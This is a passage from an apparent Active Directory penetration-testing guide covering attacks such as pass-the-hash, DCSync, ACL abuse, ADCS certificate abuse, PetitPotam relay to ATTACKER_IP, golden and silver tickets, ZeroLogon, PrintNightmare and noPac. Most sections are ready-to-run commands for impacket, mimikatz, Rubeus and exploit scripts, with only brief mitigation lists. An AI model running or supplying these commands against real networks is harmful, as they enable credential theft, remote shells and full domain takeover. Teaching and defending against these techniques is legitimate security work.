.\\DomainPasswordSpray.ps1\nInvoke-DomainPasswordSpray -Password Winter2025!\nUsing Kerbrute:\n\nbash\n# Password spray using Kerberos\nkerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt \"Winter2025!\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 6: CrackMapExec successful password spray finding valid credentials]\n\nCaption: Password spray discovers valid credentials for multiple users\nMitigation\nImplement Azure AD Password Protection\n\nUse Fine-Grained Password Policies for privileged accounts\n\nEnable SIEM alerting for distributed failed authentication\n\nAttack 7: Pass-the-Hash (PtH)\nDescription\nWindows NTLM authentication allows authentication using only the hash of a password. Once an NTLM hash is obtained, an attacker can authenticate without ever knowing the plaintext password.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.20 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c\nUsing Impacket:\n\nbash\n# Using psexec\npython3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using wmiexec\npython3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\n\n# Using smbexec\npython3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.20\nWindows - Using Mimikatz:\n\npowershell\n# Pass the hash\nsekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 7: psexec.py successful pass-the-hash attack gaining shell]\n\nCaption: Pass-the-Hash attack successfully creates remote shell using only NTLM hash\nMitigation\nEnable Protected Users group for privileged accounts\n\nImplement Credential Guard (VBS)\n\nEnforce tiered administration models\n\nDisable NTLM where possible\n\nAttack 8: DCSync Attack\nDescription\nIf an account has \"Replicating Directory Changes\" permissions, it can impersonate a Domain Controller and request replication of AD data, including password hashes for ANY account, including krbtgt and Domain Admins.\n\nCommands\nDump Specific User Hash:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-user krbtgt\nDump All NTLM Hashes:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc-ntlm\nDump Entire NTDS.dit:\n\nbash\npython3 secretsdump.py corp.local/domainadmin:Password123@192.168.1.10 -just-dc\nUsing Mimikatz (if on DC or with appropriate rights):\n\npowershell\nlsadump::dcsync /user:krbtgt\nlsadump::dcsync /domain:corp.local /user:administrator\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 8: secretsdump.py successful DCSync extracting krbtgt hash]\n\nCaption: DCSync attack extracts krbtgt hash, enabling Golden Ticket creation\nMitigation\nRestrict replication rights to only Domain Controllers\n\nAudit DCSync rights using BloodHound\n\npowershell\n(Get-Acl \"AD:\\DC=corp,DC=local\").Access | Where-Object { $_.ActiveDirectoryRights -match \"DS-Replication\" }\nMonitor Event ID 4662 for replication access\n\nAttack 9: ACL Abuse & BloodHound\nDescription\nActive Directory objects have Access Control Lists that can be misconfigured. A helpdesk account might have GenericAll on a Domain Admin account, or WriteDACL allowing modification of permissions.\n\nCommands\nCollect Data with BloodHound.py:\n\nbash\nbloodhound-python -u jsmith -p Password123 -d corp.local -dc 192.168.1.10 -c All --zip\nCollect Using SharpHound (Windows):\n\npowershell\n# Ingest all data\nSharpHound.exe -c All\n\n# With specific domain controller\nSharpHound.exe -c All -d corp.local -dc dc.corp.local\nAbuse GenericWrite to Add to Group:\n\npowershell\nAdd-DomainGroupMember -Identity \"Domain Admins\" -Members \"jsmith\"\nAbuse WriteDACL to Grant DCSync Rights:\n\npowershell\nAdd-DomainObjectAcl -TargetIdentity \"DC=corp,DC=local\" -PrincipalIdentity jsmith -Rights DCSync\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 9: BloodHound GUI displaying attack path from user to Domain Admin]\n\nCaption: BloodHound visualization shows shortest path to Domain Admin via ACL misconfigurations\nMitigation\nRun BloodHound defensively on a schedule\n\nAudit all non-default ACL entries\n\nImplement tiered administration\n\nUse tools like ADACLScanner for bulk reporting\n\nAttack 10: Unconstrained Delegation Attacks\nDescription\nWhen a computer has unconstrained delegation enabled, it stores TGTs of any user that authenticates to it. By coercing a Domain Controller to authenticate (via PrinterBug or PetitPotam), the attacker can capture a Domain Admin TGT.\n\nCommands\nFind Systems with Unconstrained Delegation:\n\npowershell\n# Using PowerView\nGet-DomainComputer -Unconstrained | Select-Object samAccountName, dnshostname\n\n# Using AD PowerShell\nGet-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation, ServicePrincipalName\nMonitor for TGTs with Rubeus:\n\npowershell\nRubeus.exe monitor /interval:5 /nowrap\nCoerce Authentication with PrinterBug:\n\nbash\npython3 printerbug.py corp.local/username:password@TARGET_DC_IP VICTIM_IP\nExtract TGT and Pass-the-Ticket:\n\npowershell\nRubeus.exe ptt /ticket:\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 10: Rubeus monitoring captures Domain Admin TGT after coercion]\n\nCaption: Unconstrained delegation attack captures DC TGT, granting Domain Admin access\nMitigation\nAvoid unconstrained delegation entirely\n\nUse constrained delegation or RBCD with explicit restrictions\n\nAudit for TrustedForDelegation accounts\n\nAttack 11: ADCS Attacks (Certified Pre-Owned)\nDescription\nActive Directory Certificate Services (AD CS) misconfigurations allow attackers to request certificates for arbitrary users, including Domain Admins, leading to complete domain compromise.\n\nCommands\nEnumerate AD CS with Certipy:\n\nbash\n# Find vulnerable templates\ncertipy-ad find -u jsmith@corp.local -p Password123 -dc-ip 192.168.1.10\n\n# Save output\ncertipy-ad find -u jsmith@corp.local -p Password123 -vulnerable -output adcs_enum\nRequest Certificate via Vulnerable Template:\n\nbash\ncertipy-ad req -u jsmith@corp.local -p Password123 -ca CORP-DC-CA -template User -dc-ip 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 11: Certipy find output showing vulnerable certificate templates]\n\nCaption: Certipy enumerates AD CS and identifies ESC1 vulnerability (Client Authentication template)\nMitigation\nDisable vulnerable certificate templates\n\nEnforce manager approval for sensitive templates\n\nImplement certificate auditing\n\nAttack 12: PetitPotam & NTLM Relay to ADCS\nDescription\nPetitPotam coerces a Domain Controller to authenticate to an attacker-controlled server. Combined with NTLM relay to ADCS HTTP endpoints, this yields a certificate for the DC, allowing DCSync and full domain compromise.\n\nPrerequisites\nAD CS server with Web Enrollment enabled\n\nDomain Controller unpatched for CVE-2021-36942\n\nCommands\nSetup NTLM Relay to ADCS:\n\nbash\npython3 ntlmrelayx.py -debug -smb2support --target http://adcs.corp.local/certsrv/certfnsh.asp --adcs --template DomainController\nRun PetitPotam to Coerce DC:\n\nbash\npython3 PetitPotam.py ATTACKER_IP DC_IP\nExtract Certificate (Linux):\n\nbash\n# Save base64 certificate\ncat base64 | base64 -d > certificate.pfx\n\n# Request TGT with PKINIT\npython3 gettgtpkinit.py corp.local/DC01$ -cert-pfx certificate.pfx out.ccache\n\n# Set cache\nexport KRB5CCNAME=out.ccache\n\n# DCSync using TGT\npython3 secretsdump.py -k -no-pass corp.local/DC01\\$@DC01.corp.local\nWindows Alternative using Rubeus:\n\npowershell\n# Request TGT from certificate\nRubeus.exe asktgt /user:DC01$ /certificate: /ptt\n\n# DCSync\nmimikatz \"lsadump::dcsync /user:krbtgt\"\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 12: PetitPotam coercing DC to authenticate to ntlmrelayx]\n\nCaption: PetitPotam forces Domain Controller authentication, captured by ntlmrelayx\nMitigation\nApply Microsoft patch KB5005413\n\nDisable NTLM on AD CS servers\n\nEnable EPA (Extended Protection for Authentication)\n\nAttack 13: Kerberos Golden/Silver Tickets\nDescription\nWith the krbtgt hash, attackers create Golden Tickets - valid TGTs for ANY user (including non-existent ones). Silver Tickets target specific services using service account hashes.\n\nGolden Ticket Commands\nUsing Mimikatz:\n\npowershell\n# Create Golden Ticket for Domain Admin\nkerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /id:500 /ptt\n\n# Create Golden Ticket with custom expiry\nkerberos::golden /user:EvilAdmin /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:HASH /startoffset:0 /endin:600 /renewmax:10080 /ptt\nUsing Impacket (Linux):\n\nbash\npython3 ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain corp.local Administrator\nexport KRB5CCNAME=Administrator.ccache\nSilver Ticket Commands\nCreate Silver Ticket for CIFS Service:\n\npowershell\nkerberos::golden /user:EvilUser /domain:corp.local /sid:S-1-5-21-123456789-123456789-123456789 /target:DC01.corp.local /service:cifs /rc4:MACHINE_ACCOUNT_HASH /ptt\nAccess DC with Silver Ticket:\n\nbash\n# Using the ticket to access CIFS\npython3 psexec.py -k corp.local/EvilUser@DC01.corp.local\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 13: Mimikatz Golden Ticket creation and successful psexec to DC]\n\nCaption: Golden Ticket allows complete Domain Controller access without valid credentials\nMitigation\nRotate krbtgt password twice (after DC compromise)\n\nEnable KRBTGT password rotation automation\n\nMonitor for anomalous TGT requests (Event ID 4768)\n\nLimit lifetime of Kerberos tickets\n\nAttack 14: ZeroLogon (CVE-2020-1472)\nDescription\nA critical vulnerability in Netlogon protocol (MS-NRPC) allows attackers to set the machine account password of a Domain Controller to an empty string, then DCSync as that DC.\n\nCommands\nCheck if Vulnerable:\n\nbash\npython3 zerologon_tester.py DC01 192.168.1.10\nExploit to Change DC Password:\n\nbash\npython3 cve-2020-1472-exploit.py DC01 192.168.1.10\nAfter Exploit - DCSync:\n\nbash\npython3 secretsdump.py corp.local/DC01\\$@192.168.1.10 -no-pass\nRestore Original Password (Critical!):\n\nbash\n# Extract original password hash from DCSync results\npython3 restorepassword.py DC01@DC01.corp.local -target-ip 192.168.1.10 -hexpass ORIGINAL_HASH\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 14: ZeroLogon exploit successfully changing DC machine account password]\n\nCaption: ZeroLogon vulnerability exploited, enabling DCSync with empty password\nMitigation\nApply Windows updates from August 2020\n\nEnable enforced Netlogon signing\n\nMonitor for Event ID 5829, 5830, 5831\n\nAttack 15: PrintNightmare (CVE-2021-1675)\nDescription\nThe Print Spooler service on Windows allows remote attackers to execute arbitrary code with SYSTEM privileges. This affects Domain Controllers and member servers.\n\nCommands\nRemote DLL Injection Exploit:\n\nbash\n# Using CVE-2021-1675.py\npython3 CVE-2021-1675.py corp.local/username:password@TARGET_IP /path/to/malicious.dll\nUsing Impacket Version:\n\nbash\npython3 printerbug.py -dll /path/to/malicious.dll corp.local/username:password@TARGET_IP\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 15: PrintNightmare exploitation yielding SYSTEM shell on DC]\n\nCaption: PrintNightmare vulnerability exploited to gain SYSTEM privileges on Domain Controller\nMitigation\nDisable Print Spooler service on Domain Controllers\n\nApply Microsoft security patches\n\nImplement print service hardening\n\nAttack 16: noPac (CVE-2021-42278/CVE-2021-42287)\nDescription\nA chain of two vulnerabilities affecting all Windows Domain Controllers. It allows a standard domain user to impersonate a Domain Controller and request a TGT for Domain Admin.\n\nCommands\nUsing noPac.py:\n\nbash\n# Request Service Ticket to domain controller\npython3 noPac.py corp.local/jsmith:Password123 -dc-ip 192.168.1.10 -dc-host DC01.corp.local -shell --impersonate Administrator\n\n# Or with hash\npython3 noPac.py corp.local/jsmith -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -dc-ip 192.168.1.10\nManual Exploitation with Rubeus:\n\npowershell\n# Add machine account\nAdd-MachineAccount -MachineAccount EvilPC -Password Password123\n\n# Clear SPNs\nSet-ADComputer EvilPC -ServicePrincipalNames @{}\n\n# Change hostname to DC\nSet-ADComputer EvilPC -DnsHostname DC01.corp.local\n\n# Request TGT\nRubeus.exe asktgt /user:EvilPC$ /password:Password123 /domain:corp.local /dc:DC01.corp.local /nowrap\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 16: noPac.py successfully obtaining DA shell from standard user]\n\nCaption: noPac attack chain escalates from low-privilege user to Domain Admin shell\nMitigation\nApply Microsoft patches (October 2021 and later)\n\nMonitor for computer account name changes (Event ID 4742)\n\nImplement PAC validation\n\nTools Reference Summary\nTool\tPurpose\tSource\nResponder\tLLMNR/NBT-NS poisoning\tKali default\nImpacket Suite\tVarious AD attacks\tpipx install impacket\nBloodHound\tAttack path mapping\tKali default\nRubeus\tKerberos abuse\tGitHub\nMimikatz\tCredential extraction\tGitHub\nCrackMapExec (netexec)\tSwiss Army knife for AD\tKali default\nCertipy\tAD CS enumeration/abuse\tsudo apt install certipy-ad\nKerbrute\tUser enumeration\tKali default\n", "creation_timestamp": "2026-05-31T23:19:52.000000Z"}]}